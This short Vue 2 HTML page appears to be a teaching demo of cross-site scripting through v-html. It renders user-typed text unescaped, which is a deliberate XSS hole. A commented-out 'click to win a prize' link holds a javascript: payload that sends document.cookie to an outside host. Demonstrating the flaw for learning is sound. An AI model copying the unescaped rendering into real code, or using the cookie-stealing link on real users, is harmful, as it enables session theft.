<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <title>v-html XSS 攻击</title>
    <script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
</head>
<body>
    <div id="app">
        <textarea v-model="message" type="text"></textarea>
        <button @click="submit">提交</button>
        <!-- <p>{{ comment }}</p> -->
        <p v-html="comment"></p>
        <!-- <a href="javascript:location.href=`https://baidu.com/${document.cookie}`;">点我中奖</a> -->
    </div>

    <script>
        new Vue({
            el: '#app',
            data: {
                message: '',
                comment: ''
            },
            methods: {
                submit() {
                    this.comment = this.message
                }
            }
        })
    </script>
</body>
</html>